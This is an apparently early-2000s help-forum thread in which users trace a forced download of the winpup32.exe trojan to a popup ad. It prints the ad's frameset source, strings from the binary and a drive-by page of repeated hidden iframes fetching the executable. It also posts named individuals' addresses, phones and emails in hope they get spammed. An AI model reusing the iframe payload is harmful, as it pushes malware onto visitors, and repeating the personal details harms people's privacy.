smokeandapancake.org winpup32.exe

Try these two little programs, they cleaned up my wife's system real good. Might work.
Download spybot here
http://spybot.safer-networking.de/index.php?lang=en&page=download

and AdAware here:
http://www.lavasoftusa.com/

esmogen:  Thank you for your quick reply.  AdAware definitely does a good job; but is not needed in this situation as I've removed it from the registry already.

The thing is that the ad or whatever it is spawns hundreds of the download winpup32.exe file window -- until it consumes a lot of system resources -- I've had 130 Internet Explorer download windows opening automatically this way.  It does not seem to be any of the HTML source code -- and the only way to avoid it (so far) is to use another browser other than Internet Explorer (e.g. Mozilla Firebird).

I should clarify my question -- has anyone come across this issue of winpup32.exe and know how it was done?  And, has anyone figured out how to avoid it (other than switching browsers?)  For example, with regard to IE security settings or IE patches...

If I find the culprit ads in question I'll try posting a link to it or something...

Whois info for, SMOKEANDAPANCAKE.ORG:
Registrant:
 Auric Van der Smoot
 Heilige Geeststraat, 1
 Suite L
 Brugge, BE 8000
 BE
Domain name: SMOKEANDAPANCAKE.ORG
Administrative Contact:
     Van der Smoot, Auric  domains@invinc.com
    Heilige Geeststraat, 1
    Suite L
    Brugge, BE 8000
    BE
    +1.5555555555    Fax: +1.5555555555

 Technical Contact:
     Van der Smoot, Auric  domains@invinc.com
    Heilige Geeststraat, 1
    Suite L
    Brugge, BE 8000
    BE
    +1.5555555555    Fax: +1.5555555555
Registration Service Provider:
    NatNames.com -- $15 Domain Names!, support@natnames.com
    770.471.9075
    http://natnames.com
    This company may be contacted for domain login/passwords,
    DNS/Nameserver changes, and general domain support questions.

 Registrar of Record: TUCOWS, INC.
 Record last updated on 27-May-2003.
 Record expires on 11-Apr-2004.
 Record Created on 11-Apr-2003.

 Domain servers in listed order:
    NS1.DATAPIPE.NET  
    NS2.DATAPIPE.NET

-------------------------------------------------------------------

Where the website is hosted...

Whois Server: whois.opensrs.net

Registrant:
 DataPipe
 80 River Street, 5th Floor
 Hoboken, NJ 07030
 US

 Domain name: DATAPIPE.NET

 Administrative Contact:
    Master, Host  hostmaster@datapipe.net
    80 River Street, 5th Floor
    Hoboken, NJ 07030
    US
    2017921918    Fax: 2017923090

 Technical Contact:
    Master, Host  hostmaster@datapipe.net
    80 River Street, 5th Floor
    Hoboken, NJ 07030
    US
    2017921918    Fax: 2017923090

Registration Service Provider:
    DataPipe, domains@datapipe.com
    2017921918
    http://www.datapipe.com
    This company may be contacted for domain login/passwords,
    DNS/Nameserver changes, and general domain support questions.


 Registrar of Record: TUCOWS, INC.
 Record last updated on 05-May-2003.
 Record expires on 26-Mar-2005.
 Record Created on 27-Mar-1998.

 Domain servers in listed order:
    NS1.DATAPIPE.NET   64.27.65.13
    NS2.DATAPIPE.NET   64.27.64.76
    NS3.DATAPIPE.NET   66.70.119.39
    NS4.DATAPIPE.NET   66.70.119.40
-------------------------------------------------------------------------------------

So the domain is registered with obvious fake info (phone # etc).

You can report to the host in New Jersey. They may be two separate entities. If
it's the same guy then you won't get a response from any email contact.

First off it's an *.exe and there is no way that *.exe gets on your computer unless
you had given it some help like installing pirate software, cracks, or clicked on
an email attachment that you had no idea where/who/what it was. Once clicked
on it wrote to start it's self on bootup.

The only other way to be victim of this exploit is to run an outdated WindowsXX with
an unpatched browser that allows this cheap, old, ActiveX exploit run.

FROM CODE IN winpup32.exe:
H K E Y _ L O C A L _ M A C H I N E \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \
S y s t e m R o o t   \ S y s t e m \    w i n p u p 3 2 [ 1 ] . e x e       \ w i n p u p 3 2 [ 2 ] . e x e
H K E Y _ L O C A L _ M A C H I N E \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \
R u n \ w i n 3 2 a p p  w i n p u p 3 2 . e x e

And it's popping up to:
w w w . m a r t y l i k e s ********.com ( didn't post the whole url cause it's porn).

The guilty party's name is;
Jason Buckley
      252 Bartemus Trail
      Nashua, NH 03063
      US
      Phone: 603-889-4220
      Email: jason@whitelid.com

So, the way this all works is when one surfs porn and things popup...don't say "YES".


>>I've had 130 Internet Explorer download windows opening automatically this way<<

Also in the code is a BHO exploit. Your browser has been exploited.
 I n t e r n e t E x p l o r e r . A p p l i c a t i o n     V i s i b l e   S t a t u s B a r   A d d r e s s B a r
M e n u B a r   T o o l B a r   H e i g h t     W i d t h   \   w w w . m a r t y l i k e s********.com
/ i m a g e s / b a n n e r s / h p a 1 /     N a v i g a t e   W S c r i p t . S h e l l   S y s t e m  E n v i r o n m e n t

>>AdAware definitely does a good job; but is not needed in this situation<<
You have to remove the BHO by hand or with a special program. Have you done this?

spiderfix:  Thank you for your detailed reply!

(AdAware - version 6 - with the latest update - did not detect anything on my system; nor did NAV 2003 - also with the latest definitions notice anything wrong)

I am pretty certain the 130 download windows for smokeandapancake.org's winpup32 came from an advertisement; as it appeared while browsing a Xanga page both times it happened to me.  It was NOT an Active X security alert window; it was a normal IE6 download window with "Open", "Save", "Cancel" and "More Info" options -- except that it came up 130 times (well, the taskbar grouped all 130 IE windows together so I suppose it was 129 times + the window I had open).  It has not happened at any other time, nor have I installed any new software recently nor have I surfed any *questionable* sites!

So, is winpup32.exe a program that pops up a "marty likes *****" site?  (I've not seen it so far because I removed all references to winpup32.exe from the registry and deleted the program.)

I've reported smokeandapancake.org to abuse@datapipe.com (is that right?); I got an automated reply from them.

How can I remove the BHO exploit?  Thank you!  I'll accept your answer once I get a reply on how to remove the BHO exploit!

I just found the culprit site (back by surfing Xanga again... until the FreeMP3Blaster popup came up...)   It was indeed from a popup.


The popup ad in question is:    http://media.popuptraffic.com/scripts/popup.php?hid=15a06373d81c1924f3f3&tmpl=8mp3pop(dot)tmpl

Thie file has the source code:

-----------------------------


<html><head><title>FreeMP3Blaster</title></head>
<frameset rows="100%,0" FRAMEBORDER="0" FRAMESPACING="0" BORDER="0">
<frame src="http://undergroundlair(dot)net/pops/mp3popnt(dot)html" name="content" marginheight="0" marginwidth="0" scrolling="no" noresize>
<frame src="http://www.undergroundlair(dot)net/install(dot)php" name="count" marginheight="0" marginwidth="0" scrolling="no" noresize>
</frameset></html>


-----------------------------

So, I looked for the two files and opened it with Notepad:

http://undergroundlair.net/pops/mp3popnt(dot)html is a NORMAL POPUP WINDOW:

-----------------------------

<!DOCTYPE HTML PUBLIC "-//W3C//Dtd HTML 4.0 transitional//EN">
<!-- saved from url=(0043)http://www.freemp3blaster(dot)com/?10085|50060| -->
<HTML>
<HEAD>
<TITLE>FreeMP3Blaster.com</TITLE>
<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">

<STYLE>td {
      FONT-SIZE: 10px; FONT-FAMILY: Verdana
}
.menu {
      TEXT-DECORATION: none
}
</STYLE>

<META content="MSHTML 6.00.2722.900" name=GENERATOR></HEAD>
<BODY topmargin="0" text=#000000 vLink=#000099 aLink=#000099 link=#000099 bgColor=#000000>
<img src="http://www.freemp3blaster.com/install.phtml?10085|50060|mp3pop" width=1 height=1 border=0>
<TABLE cellSpacing=0 cellPadding=0 width=750 align=center border=0>
<tr><td colSpan=2 height=5>
<TABLE cellSpacing=5 cellPadding=0 width=750 align=center border=0>
<tr vAlign=top><td width=178 bgColor=#ffffff><IMG height=25 src="mp3pop/ttl_genres2.gif" width=180><BR>&nbsp;<BR>
<TABLE cellSpacing=0 cellPadding=5 width="100%" border=0>
<tr><td width="15%"><A href="http://www.freemp3blaster(dot)com/install(dot)phtml?10085|50060|mp3pop"><IMG height=14 src="mp3pop/arrow.gif" width=14 border=0></A></td>
<td width="85%"><A class=menu onmouseover="window.status='Rock/Pop Classic Rock, 80s, Metal...'; return true" onmouseout="window.status=' '; return true" href="http://www.freemp3blaster(dot)com/install(dot)phtml?10085|50060|">Rock/Pop Classic Rock, '80s, Metal...</A></td></tr>
<tr><td width="15%"><A href="http://www.freemp3blaster.com/install(dot)phtml?10085|50060|mp3pop"><IMG height=14 src="mp3pop/arrow.gif" width=14 border=0></A></td>
<td width="85%"><A class=menu onmouseover="window.status='Alternative/Punk Indie, Punk, Hardcore...'; return true" onmouseout="window.status=' '; return true" href="http://www.freemp3blaster.com/install(dot)phtml?10085|50060|">Alternative/Punk Indie, Punk, Hardcore...</A></td></tr>
<tr><td width="15%"><A href="http://www.freemp3blaster(dot)com/install(dot)phtml?10085|50060|mp3pop"><IMG height=14 src="mp3pop/arrow.gif" width=14  border=0></A></td>
<td width="85%"><A class=menu onmouseover="window.status='Electronic/Dance Techno, Ambient, Drum n Bass...'; return true" onmouseout="window.status=' '; return true" href="http://www.freemp3blaster(dot)com/install(dot)phtml?10085|50060|">Electronic/Dance Techno, Ambient, Drum 'n' Bass...</A></td></tr>
<tr><td width="15%"><A href="http://www.freemp3blaster,com/install(dot)phtml?10085|50060|mp3pop"><IMG height=14 src="mp3pop/arrow.gif" width=14 border=0></A></td>
<td width="85%"><A class=menu onmouseover="window.status='Urban/Hip Hop Hip Hop, Soul, Funk...'; return true" onmouseout="window.status=' '; return true" href="http://www.freemp3blaster.com/install(dot)phtml?10085|50060|">Urban/Hip Hop Hip Hop, Soul, Funk...</A></td></tr>
<tr><td width="15%"><A href="http://www.freemp3blaster,com/install(dot)phtml?10085|50060|mp3pop"><IMG height=14 src="mp3pop/arrow.gif" width=14 border=0></A></td>
<td width="85%"><A class=menu onmouseover="window.status='Blues Chicago, Delta, Contemporary...'; return true" onmouseout="window.status=' '; return true" href="http://www.freemp3blaster.com/install(dot)phtml?10085|50060|">Blues Chicago, Delta, Contemporary...</A></td></tr>
<tr><td width="15%"><A href="http://www.freemp3blaster,com/install(dot)phtml?10085|50060|mp3pop"><IMG height=14 src="mp3pop/arrow.gif" width=14 border=0></A></td>
<td width="85%"><A class=menu onmouseover="window.status='Jazz Bebop, Swing, Latin...'; return true" onmouseout="window.status=' '; return true" href="http://www.freemp3blaster,com/install(dot)phtml?10085|50060|">Jazz Bebop, Swing, Latin...</A></td></tr>
<tr><td width="15%"><A href="http://www.freemp3blaster.com/install(dot)phtml?10085|50060|mp3pop"><IMG height=14 src="mp3pop/arrow.gif" width=14 border=0></A></td>
<td width="85%"><A class=menu onmouseover="window.status='Country/Folk Bluegrass, traditional Country ...'; return true" onmouseout="window.status=' '; return true" href="http://www.freemp3blaster.com/install(dot)phtml?10085|50060|">Country/Folk Bluegrass, traditional Country ...</A></td></tr>
<tr><td width="15%"><A href="http://www.freemp3blaster.com/install(dot)phtml?10085|50060|mp3pop"><IMG height=14 src="mp3pop/arrow.gif" width=14 border=0></A></td>
<td width="85%"><A class=menu onmouseover="window.status='World/Reggae Dance Hall, Fusion, Dub...'; return true" onmouseout="window.status=' '; return true" href="http://www.freemp3blaster.com/install(dot)phtml?10085|50060|">World/Reggae Dance Hall, Fusion, Dub...</A></td></tr>
<tr><td width="15%"><A href="http://www.freemp3blaster,com/install.phtml?10085|50060|mp3pop"><IMG height=14 src="mp3pop/arrow.gif" width=14 border=0></A></td>
<td width="85%"><A class=menu onmouseover="window.status='Soundtracks/Other Film, Comedy, Spoken Word...'; return true" onmouseout="window.status=' '; return true" href="http://www.freemp3blaster,com/install(dot)phtml?10085|50060|">Soundtracks/Other Film, Comedy, Spoken Word...</A></td></tr></TABLE>
</td>
<td width=353 bgColor=#999999><P><IMG height=25 src="mp3pop/ttl_listen.gif" width=350><BR><A href="http://www.freemp3blaster.com/install(dot)phtml?10085|50060|mp3pop"><IMG height=92 src="mp3pop/mp3player.gif" width=344 border=0></A> </P>
<TABLE cellSpacing=0 cellPadding=0 width=340 align=center border=0>
<tr><td width=25><IMG height=120 src="mp3pop/ttl_thebuzz.gif" width=25></td>
<td width=150><A href="http://www.freemp3blaster,com/install(dot)phtml?10085|50060|mp3pop"><IMG height=120 src="mp3pop/shania.jpeg" width=140 border=0></A></td>
<td width=175><P>Hear the latest from Shania Twain as well as new music from Alison Krauss, Dolly Parton and more!</P><P><A href="http://www.freemp3blaster.com/install(dot)phtml?10085|50060|mp3pop"><IMG height=15 src="mp3pop/play.gif" width=15 align=absMiddle border=0></A> <A href="http://www.freemp3blaster,com/install(dot)phtml?10085|50060|mp3pop">DOWNLOAD</A></P></td></tr>
<tr><td width=25>&nbsp;</td><td width=150>&nbsp;</td><td width=175>&nbsp;</td></tr>
<tr><td width=25><IMG height=120 src="mp3pop/ttl_thebuzz.gif" width=25></td>
<td width=150><A href="http://www.freemp3blaster.com/install(dot)phtml?10085|50060|mp3pop"><IMG height=120 src="mp3pop/snoop.jpeg" width=140 border=0></A></td>
<td width=175><P>New From Snoop Dogg Play his smokin' track "From Tha Chuuuch To Da Palace" off his forthcoming sixth album. </P><P><A href="http://www.freemp3blaster.com/install(dot)phtml?10085|50060|mp3pop"><IMG height=15 src="mp3pop/play.gif" width=15 align=absMiddle border=0></A> <A href="http://www.freemp3blaster.com/install.phtml?10085|50060|mp3pop">DOWNLOAD</A></P></td></tr></TABLE></td>
<td width=240><A href="http://www.freemp3blaster,com/install(dot)phtml?10085|50060|mp3pop"><IMG height=400 src="mp3pop/software.gif" width=240 border=0></A></td></tr></TABLE></td></tr>
</TABLE>
<br><div align="center"><A href="http://www.freemp3blaster,com/privacy(dot)html"
target=_blank><FONT face="Verdana, Arial, Helvetica, sans-serif" color=#cccccc
size=1>Terms &amp; Conditions</FONT></A></div>
<script language='JavaScript' type='text/javascript' src='nt.js'></script>
</BODY>
</HTML>

-----------------------------


HOWEVER:  http://www.undergroundlair.net/install.php   is the culprit URL.  This is the code:

-----------------------------


<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">

-----------------------------

And thus, the result is 100's of popup windows.  No wonder!!!!

And thus, it was neither because of some funny download; it was not a porn site.  Is it still a BHO exploit?  Or is this something else?  -- a even crazier form of internet advertising??

Ummm... can someone make the links NOT CLICKABLE????   Coz it is a big risk if someone clicks the links above... Sorry...

spiderfix:  Thank you for your reply.  I have accepted your answer.  I suppose the dialer won't work for people connected by broadband?

I submitted the following complaint to the company hosting the ad -- admin@popuptraffic.com -- but the address seems to be down - it routes to bigron@rcn.com and the result is "Returned Mail - Over Quota ----- The following addresses had permanent delivery errors ----- bigron@rcn.com".

********

Recently I have come across an advertisement served on your server which is extremely forceful and annoying -- it launches hundreds of download windows forcing a download of some kind of trojan or spyware called winpup32.exe on users running Windows/Internet Explorer.

The advertisement in question is: http:// media.popuptraffic.com/scripts/popup.php?hid=15a06373d81c1924f3f3&tmpl=8mp3pop.tmpl

This loads a frameset; one of which is http:// www. undergroundlair.net/install.php which forces a download from http:// www. smokeandapancake/winpup32.exe. Others have noted that this program serves a VB script code which links to a pornographic site.

I have seen it a number of times while browsing Xanga (presumably one of the sites you serve advertising on), and the FreeMP3Blaster.com must have been the rudest and most forceful form of advertising I have ever seen.  I believe the advertisement in question breaks your terms and conditions (http:// stats. popuptraffic.com/terms.html) and should be removed immediately.

Please remove the offending advertisement (and advertiser) from your service, check other advertisements on your service; and include code to ensure such things do not happen in future.

********

A solution to prevent the hundreds of download windows/machine gun page problem seems to be to add *.popuptraffic.com to the Restricted Sites list on Internet Explorer, which means anything from popuptraffic.com is not allowed to run scripts.  However, it is by NO means a perfect solution -- the culprit responsible may have put his winpup32/FreeMP3Blaster advert with ANOTHER advertiser.  Perhaps, the only real solution from the 'machine gun page' is to use another browser?

Your welcome.

>>I suppose the dialer won't work for people connected by broadband?<<
Only if they have a modem and telephone line connected.

>>forcing a download of some kind of trojan or spyware called winpup32.exe<<
You don't want to give it a name or function if you don't know what it is. I would
just say it's "a forced *.exe download that contains pornographic links within its code"
or something along those lines only.

popuptraffic.com email contact = domains@standardinternet.com
hosted on machines belonging to = DATAPIPE.NET   hostmaster@datapipe.net

undergroundlair.net domains@invinc.com (fake info)
also hosted on machines belonging to = DATAPIPE.NET   hostmaster@datapipe.net

freemp3blaster(d.o.t.)com = targetcommunicators(a.t.)yahoo.com

martylikes*******.com
jason@whitelid.com domain owner
name server = BROKECOLLEGE******.COM

So out of those I would contact datapipe.net (where the site is hosted) since the domain
registration information is fake on undergroundlair.net you'd probably be emailing to deaf
ears there. freemp3blaster I would throw one off to but since it's a yahoo email addy well...

The martylikes*******.com and the domain name server both belong to the same guy,
but he may be a sponsor and this popup forced download will definitely be against the
client agreement policy.

Also I have no reservations about posting these email addresses here at EE. Webmasters
know that they will be harvested a thousand times. So these people will get some spam
because their email addresses lay here...it's a small consolation. I saved freemp3blaster(d.o.t.)com
from this because they may be innocent of all this.

I run by the belief that if you surf porn then you better expect some flak but webmasters who
use non-adult sites to promote porn have crossed the line of decency and they deserve to be
taken out at the knees.

Thanks!

>> I run by the belief that if you surf porn then you better expect some flak

I totally agree.  But for the record, I have not been surfing anything 'bad'!

I've emailed Xanga about this -- asking whether they are indeed using popuptraffic.com as one of their advertisers; and if they are, to get popuptraffic to remove the offending ad.  This is the reply I got:

"Xanga DOES NOT SERVE POP UPS. But other third party providers will such as Flooble Chatterbox. So if you feature them or have that on your Xanga site or some other third party feature then this can happen.

Typically what happens is that some other company is getting their ad put up thrue [sic] them.

I hope this helps. Thanks for the e-mail."

As they were saying, it might be third-party providers.  Or perhaps, (and I am purely speculating here) since Xanga is a online community, there's a possibility that some user linked to some other site for their images or iframes or whatever; and thus, the porn-related advertisements appear.  However, if that is the case, then some Xanga user has broke the Xanga terms and conditions (except it's hard to pinpoint since the ads seem random).

------

Also, notice that the advertisement pretends to be mp3.com (it copies the site design) -- when in fact it links to freemp3blaster.com.  MP3.com is definitely unrelated -- so perhaps this is something mp3.com ought to be looking in to -- if they care about their brand name.


------

Datapipe.net
I got an automated reply from Datapipe:

"The information that you have provided will be used to investigate the incident for violations of our Acceptable Use Policy at:
http://www.datapipe.com/Acceptable_Use_Policy.asp
Once the investigation is complete, action in accordance with our policies will be taken against the offending account immediately.  
Since the current volume of email prohibits a personal reply to all reports, unless additional information is required, this may be the only response you will receive.
DataPipe maintains a "zero tolerance" policy towards spam and network abuse at any time."

https://www.experts-exchange.com/questions/20641756/winpup32-exe-from-smokeandapancake-org.html

See my solution here for another way to block it.

brakk0:  thanks - yes, adding media.popuptraffic.com to hosts file seem to do the trick!
i'll be keeping track of that thread as well.

update-

it seems like the ad no longer pops up from the media.popuptraffic. com site noted above.  so that's a step forward!  however, the sites in question still exist.

http:// www. undergroundlair.net / install.php   still exists and now points to:
<iframe src="http:// www. smokeandapancake.org/ shizzy/pwf/winpup32. exe" width="0" height="0">

so, datapipe.net hasn't removed the culprit's sites in question yet

(note:  spaces added in the URL to prevent them from turning into live links)

-------------

I also contacted mp3.com (because the ad in question copied their site design and basically infringes their trademarks) but they either don't care or completely missed the point:

"We are sorry that you were not satisfied with our service
and appreciate you taking the time to give us this feedback concerning your experience with MP3.com.  We will use your feedback to continue to improve the level of service we provide our customers. "

My Norton AV reported hunderds of Winpup32.exe as Trojan Horse or Backdoor.Trojan. Are you sure it just starts download sessions?

One mornin I woke up
Download Winpup32 from Smokeandapancake?
I said OK

Norton antivirus said, Virus time(TROJAN)
Norton antivirus didnt fix it

I found this site.

I downloaded spyware since my norton didnt fix it
I ran spyware.
I saw all files with a virus
I went to C/programfiles/commonfiles/gmt/banners

I deleted everything in the folder in the afternoon

I rebooted

I ran norton virus scan. No more virus.

My theory. Someone wrote a program to stop popups. They named it winpup32. It went biserk like frankenstien. I guess they got the name Smokeandapancake from the movie Goldmember.

Thats all I have

gibilix:  no, the program COMES from a particularly forceful advertisement which forces download sessions on users using an iframe exploit in Internet Explorer.  however, yes, you are right, IS a trojan horse/backdoor --- I'm glad to hear that Norton AntiVirus now reports it as a trojan now.

defini:  read spiderfix's responses above - winpup32 seems to be porn-related.